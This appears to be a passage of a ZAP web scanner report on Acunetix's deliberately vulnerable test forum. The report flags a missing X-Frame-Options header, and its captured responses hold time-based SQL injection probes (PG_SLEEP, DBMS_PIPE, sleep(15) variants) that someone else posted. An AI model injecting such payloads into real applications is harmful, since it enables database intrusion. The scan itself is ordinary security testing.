href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=53 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3205 |
Response Body - size: 3,205 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=54 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3244 |
Response Body - size: 3,244 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:58 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=55 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3145 |
Response Body - size: 3,145 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum if(now()=sysdate(),sleep(15),0) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/if(now()=sysdate(),sleep(15),0) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:59 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>if(now()=sysdate(),sleep(15),0) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=56 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3181 |
Response Body - size: 3,181 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=57 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3181 |
Response Body - size: 3,181 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=58 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3403 |
Response Body - size: 3,403 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:23 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=59 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1'" </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1'" </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1'" - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3251 |
Response Body - size: 3,251 bytes. |
